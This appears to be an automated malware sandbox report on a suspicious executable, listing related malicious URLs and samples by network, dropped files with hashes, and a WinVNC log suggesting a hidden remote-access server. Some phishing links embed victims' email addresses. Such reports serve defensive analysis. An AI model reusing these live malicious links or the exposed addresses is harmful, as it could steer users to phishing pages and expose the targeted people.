	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://clickeuc1.actmkt.com//s/052-0d3f28ba-446f-45fc-aaa8-4c1728edb7be?enr=naahiaduabyaa4yahiac6abpabsqa4qaneaggadbaa2aanaafyadaabqaayaa5yamuageadiabxqa4yaoqagcadqabyaalqammag6adnaaxqa3yao4agcadbaaxqa7aamqagyadbabzaa5iamuadkabuaayqaqaam4ag2adbabuqa3aafyaggadpabwqa7aagaahyad4aayaaniagiac2abqabsaamyamyadeabyabraayiafuadiabuaa3aazqafuadiabvabtaayyafuagcadbabqqaoaafuadiaddaayqanyagiadqadfabsaayqag4ageadfab6aamaaguadsabnabtaaoiagmagiabqabtaamiagqac2abtaa2qaziamyac2abuabsqaoiamuac2abzaa2aazqagqac2abraayqamyamyadoabvaa3aazaamqadsabrabqqa7aagaadaabraawqazqaguadaabrabtaazaagmadcabnaa4qanyageadqabnaa2aaniaheadoabnaa4qamyamuadeabnaa3aanqamyaggabwabtaayqamuagiadgaazqamiapqahyacbab6aa===#Y2lyby5zb2FyZXNAbm92b2JhbmNvLnB0&xcpShlR	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	http://mailing-stats.clubview.co.uk/ls/click?upn=JGTDuCHFcCqat3Th7oew44Ossg-2F2NTVg-2BtYj7w1DoMH5YmBe3nFFnuJtHf-2BnYwqFV20JUmqqJfg-2FmMpr4r23ZokFQC7mKC3gGQrz9PVyBwY-3DgP2X_ycFUGOmj-2BzZRMCTo5aRQsS6Jkwa-2Bnfox4zR-2BIEsEWER5kKFE9-2B6WqMFMwjupMYIg47qAuiflHf29TpR-2Bi-2F2mpiCBhllU0f8DN7APb4-2BqWtgh6hvaMQpGLpKUcO0SpRuVoG1yfmXGgWnDxA6cKh7QHvB7k0W6xAQXsN1TOZ8sQxZocfk0XSJvtCZMWElpBVjmRa374HG9YdZqMioBmLh3gF0KvEd5YaRKrqX-2FZlEGidk-3D	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	152.195.19.97
	Bank_Verification_Form.html	Get hash	malicious	Unknown	Browse	152.199.4.33
	https://link.mail.beehiiv.com/ss/c/PueTBZLlh8npO1epiTd7L1qK7CpRRWYkaLDcsmBux7Yam39KuLLNtl2CtcuJF0W6nDvOaHFjuVJqpI778hwLFcCSp0xP9lBQd1QwXw9sjsZpVYGzcacqb2r93Fs_qwmI5Crcdaw4hELdJtUMeK51Pw/436/YGLbNQWXRWqqEnC5oYBqNw/h6/WcxpuAi4FcomQTdzggxEu522j_jrrOITkmIHaWx4Wxc#/?email=kim.ansell@proampac.com	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
OARNET-ASUS	8iolWfLe1f.elf	Get hash	malicious	Unknown	Browse	130.110.238.104
	2XcXiCaqz1.elf	Get hash	malicious	Mirai	Browse	206.244.62.50
	huhu.arm5.elf	Get hash	malicious	Mirai	Browse	138.30.225.135
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	140.228.29.110
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	140.228.29.110
	huhu.arm5.elf	Get hash	malicious	Mirai	Browse	157.134.214.94
	skyljne.arm7.elf	Get hash	malicious	Mirai	Browse	136.227.248.206
	ZMuJrxk7ff.elf	Get hash	malicious	Unknown	Browse	140.229.52.187
	skyljne.x86.elf	Get hash	malicious	Mirai	Browse	140.222.172.141
AMAZON-AESUS	https://action.azurecomm.net/api/a/c?r=AIAACQJ7N3RHRZX6IZM33IBYQ4MNDYSKJPZHFK44PSWHNQ6FEVHFP2RA3BSNZVTHGF6HKUB6O2LBGSRHI3FY3KAKX3EKHPYOCU7YEFYYN4AR7S324Y5XUXYFZRZDPPRQPH6WDT4WNFNQ454B76IIVAHFGIDS7DQ&d=AIAADB5AXS66X5S3O3K4JZUUU6B4GB2NGCAUGZLVANYHV7ATW4L67VZGBIG34MI4XYO55VPP7DJOHMIEFUYCBIVG2ZYW7S5DJRPBJFVECG6FJB2GVAVFPB4WLTSBYQS6PDH2HY5T6YX4YWFXUNUDCAMATEP4EKF4ISUQN6OXSAR3SMFWYDBXU4QRJ2DR3UNTY7PL434LB3FIJPEQUQXKM6KHE4CVIMY6DNB2JNBKCBHG6VWPIUZUMYM42HH4CRRQMCQSV2QU5H7N4HFIMOFCDCAGDQZYFVA&url=yygpKSi20tdPTi1KLElNzkjOTyzJzEsvzq7K00vO16tK1E8uKNYHAA==	Get hash	malicious	Unknown	Browse	34.193.113.164
	http://timelessbeautylessons.com	Get hash	malicious	Unknown	Browse	18.210.229.244
	https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmM	Get hash	malicious	HTMLPhisher	Browse	52.205.158.56
	https://firebasestorage.googleapis.com/v0/b/zimbra-e4109.appspot.com/o/index.html?alt=media&token=82649150-32e4-4926-b715-5c594db085ea	Get hash	malicious	Unknown	Browse	18.208.125.13
	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=	Get hash	malicious	HTMLPhisher	Browse	44.197.233.190
	Poste officiel	Get hash	malicious	Unknown	Browse	3.224.184.191
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	35.171.113.32
	http://ad735.es	Get hash	malicious	Unknown	Browse	54.89.32.163
	https://rayvehiclesandrepair.taplink.ws	Get hash	malicious	HTMLPhisher	Browse	52.2.170.208
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	18.215.61.248
AKAMAI-ASUS	http://timelessbeautylessons.com	Get hash	malicious	Unknown	Browse	96.17.33.186
	Payment proof.eml	Get hash	malicious	HTMLPhisher	Browse	23.50.120.157
	0IY4t0eqn2.exe	Get hash	malicious	DarkTortilla, RedLine	Browse	23.54.200.159
	SecuriteInfo.com.Trojan-Spy.AgentTesla.19330.30734.exe	Get hash	malicious	Unknown	Browse	184.30.122.172
	SecuriteInfo.com.Trojan-Spy.AgentTesla.19330.30734.exe	Get hash	malicious	Unknown	Browse	184.30.122.172
	qRNGy553ii.exe	Get hash	malicious	Unknown	Browse	104.84.231.73
	5BC5gMj9mA.elf	Get hash	malicious	Unknown	Browse	84.53.135.134
	F0fDzieAG4.elf	Get hash	malicious	Mirai	Browse	184.30.64.206
	java.exe	Get hash	malicious	Tinba	Browse	173.222.162.32
	python.exe	Get hash	malicious	CobaltStrike	Browse	23.54.200.159

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Games\IDD.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.9219280948873623
Encrypted:	false
SSDEEP:	3:DdWcw:Bbw
MD5:	EF303119CD5A401423EFE69D77275604
SHA1:	0D2534C78AE7A1FD9CC5FF0DDED77800B171F787
SHA-256:	F1A65F2D0644D187AFD37F75EDC06E25D412C3A6218619A39101C2A5CDCB61EA
SHA-512:	CAA5CA40AEAD79316B20A3F6977B255D2677F7472642579D405A945137E3B7F9661C655510D6A6761E046910335E3953C40BF3AD77671EAF237895A7B03F718C
Malicious:	false
Preview:	5383948 ..

C:\Games\WinVNC.log

Download File

Process:	C:\Games\taskhost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1421
Entropy (8bit):	4.919536877398004
Encrypted:	false
SSDEEP:	24:y38ApvI/dg3KtcJaAwp+Sjh31Nemb31NemnGRyQEgshgOZbHNDuwOZxD//P33k34:y3LFI/dg3XJaAwp+Sj7txtG8kshgMb5i
MD5:	6EF42238183882749CCFD368788B3A3C
SHA1:	E33154329DD1916C0F605B115F0BE7A77BFF6EA7
SHA-256:	DF25EFF50326E1DDF0A3489EA946A392902E6207ECA623E88A7BF4456BDF78B0
SHA-512:	632DA8709411633142BF496AD76E4DC833FD5D41DA903CC27A15E2D00F5D03403E0BD81BC150FEC000B560DC78E472DCC2276F207957629D90B8EEDE8CA67675
Malicious:	false
Preview:	Tue Jan 23 12:18:21 2024.WinVNCAppMain : WinVNCAPPMain-----Application started.WinVNCAppMain : server created ok.imp_desktop_thread : OpenInputdesktop OK.imp_desktop_thread : SelectHDESK to Default (370) from 11c.imp_desktop_thread : Username user .vncMenu::vncMenu : vncmenu(server).Tue Jan 23 12:18:22 2024.vncServer::SetAuthHosts : authhosts cleared.vncServer::EnableConnections : SockConnect 0.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : trying port number 5900.Tue Jan 23 12:18:24 2024.VSocket::Close : closing socket.vncServer::EnableConnections : SockConnect Done 1.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : SockConnect 1.vncSockConnectThread::run_undetached : started socket connection thread.vncHTTPConnectThread::run_undetached : started HTTP server thread.imp_desktop_thread : PostAddNewClient IIIII.Tue Jan 23 12:18:25 2024.vncServer::AutoConnectRetry : AutoConnectRetry(): started.vncServer::actualRetryThread : Attempt

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.252775680408843
Encrypted:	false
SSDEEP:	6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
MD5:	60425B4FF8C1C1A6F2D0092A7F15EF6F
SHA1:	662F7165E9DCE1C85B5F6C60853F13E5E9658325
SHA-256:	9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
SHA-512:	CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
Malicious:	false
Preview:	2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.252775680408843
Encrypted:	false
SSDEEP:	6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
MD5:	60425B4FF8C1C1A6F2D0092A7F15EF6F
SHA1:	662F7165E9DCE1C85B5F6C60853F13E5E9658325
SHA-256:	9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
SHA-512:	CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
Malicious:	false
Preview:	2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.19553724333011
Encrypted:	false
SSDEEP:	6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
MD5:	6111CAE82E5ED6DFB2D5ED0321FCFE6D
SHA1:	4B71E616B9216D8A038A54202BF10E48364A432B
SHA-256:	C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
SHA-512:	410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
Malicious:	false
Preview:	2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.19553724333011
Encrypted:	false
SSDEEP:	6:HMWpPUMmQuH0jyq2Pwkn2nKuAl9Ombzo2jMGIFUt8+MWpPUMmSc511Zmw++MWpP1:H5PPVI0jyvYfHAa8uFUt8+5PPlcV/++b
MD5:	6111CAE82E5ED6DFB2D5ED0321FCFE6D
SHA1:	4B71E616B9216D8A038A54202BF10E48364A432B
SHA-256:	C8FF27F73BEDF7198BD15020DA2A6438AED615B40654BAE2E84D64DDAB4E1A46
SHA-512:	410B42C40DE1177727C5E5677BEFCCBAEA254F92EAC133A6167D99A61FA850C0A27B85F49B9B483F8CF7C2052CB26DB4EFDABAA21DF28DE986A12988B09836AB
Malicious:	false
Preview:	2024/01/23-12:18:09.769 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:18:09.771 1be4 Recovering log #3.2024/01/23-12:18:09.771 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\585b98c7-6e1b-42c6-9d18-1e6776e46b81.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.9650414169567965
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
MD5:	DB44F690ED46A9B57D69DF5164126886
SHA1:	E7E352F6B3C35C5355DC9FC134506E2261894692
SHA-256:	C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
SHA-512:	918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.9650414169567965
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZQiysBdOg2H4caq3QYiubInP7E4T3y:Y2sRdsC3dMHz3QYhbG7nby
MD5:	DB44F690ED46A9B57D69DF5164126886
SHA1:	E7E352F6B3C35C5355DC9FC134506E2261894692
SHA-256:	C67D0B042F36E540543294FDA5079CE6726D68234D1EE935CB4DC0FDEF5E29CA
SHA-512:	918E36E5170CC2B5FFB905161A9C89E2FC25E42AF3BA7425B2D71A5D35F648437B5B1AF7067DF6F8EACA2C921D388CBD7FFDD5F70B382992DF8C9C9E3C551912
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568701451515","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119225},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.256625461075982
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7bYLrG/y:etJCV4FiN/jTN/2r8Mta02fEhgO73gos
MD5:	94220663132224431A0735E6DC62D8D9
SHA1:	A20AAFC67813BBCA896816A65D1796516A549965
SHA-256:	9B0DE5074BE034AEEA10A3F651C0F988324F1658E88875A6278269941CF514EB
SHA-512:	E59336BA9AD339BF3AFF78BF4E972B00EA895D6DFCA0C72C9EA57B24D48196EAB5067616231EE685B7D3F1C75248ED0C4375AD8E5B0A9EACF5E39865E20078E3
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.109846479746542
Encrypted:	false
SSDEEP:	6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
MD5:	99BEB36717C7BB72FB92C972D6CAEDE4
SHA1:	3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
SHA-256:	A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
SHA-512:	25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
Malicious:	false
Preview:	2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.109846479746542
Encrypted:	false
SSDEEP:	6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
MD5:	99BEB36717C7BB72FB92C972D6CAEDE4
SHA1:	3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
SHA-256:	A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
SHA-512:	25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
Malicious:	false
Preview:	2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444965548209977
Encrypted:	false
SSDEEP:	384:yezci5tciBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r7s3OazzU89UTTgUL
MD5:	F3D03763B49598DBAD45643FF5B9548C
SHA1:	8DB0B1C6C2AF2D7DAE7B96394E992152C9EB1ECC
SHA-256:	E75B7D24B58CCF162BBD5E2353FB8538226A057239CA98F8BFE488FDAF0432BE
SHA-512:	D0E870D59182C5A09313490AA9EA07E43416BAEE2F2BD9D39E4B244761B25FD8869E5560529E2432525F7FE0B113E4798B5A1B76B5F541F4876CFACA163BBEFB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.775195806422905
Encrypted:	false
SSDEEP:	48:7M4Dp/E2ioyVmioy9oWoy1Cwoy1yKOioy1noy1AYoy1Wioy1hioybioyEoy1noy+:7DDpjumFJXKQpBWb9IVXEBodRBkZ
MD5:	F4A34F8B68409CDAC14B3E7E86D35C74
SHA1:	A88C78C32487317F1CABF717102232DF47A71320
SHA-256:	6A44DA9F4C3E639DCC7656ECE568E8D3E371B6CD010F69D9D4B1F0F3A2F1B2F0
SHA-512:	320A379E05DB9CE1634014891DEF5A39DBFD4D60194E0265BA2887562FA04BFAEF65BB48B0A86771F3EF9A33AB3CE9B0EB288FAEADA992EC851F9FA8DEB30BBA
Malicious:	false
Preview:	.... .c.......U................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	66791
Entropy (8bit):	7.995531727155867
Encrypted:	true
SSDEEP:	1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
MD5:	AC05D27423A85ADC1622C714F2CB6184
SHA1:	B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
SHA-256:	C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
SHA-512:	6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
Malicious:	false
Preview:	MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.\| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..Q..._<.S....{a.=.n...PT.Um).\| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.1308583258674845
Encrypted:	false
SSDEEP:	6:kKtIHesurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:iHNPkPlE99SNxAhUeWcC
MD5:	345D1F3907A46A8C8C8F1F625ACADB22
SHA1:	9208172DBA451DC3B503E8DCB16E47A42D73F935
SHA-256:	FECB11CC085BD55C400F7DEF826DA5443366D4F557F510C059AC1426BF4EE47C
SHA-512:	A1641CC0EAC173419E1C773A6C7AAFADF4CFBC4B87870AD56F3EA08C4845708F07E13CED231619D69142F8197966F83D308BC15FBE136A3DCB698E40A1EF7DCC
Malicious:	false
Preview:	p...... .............M..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...

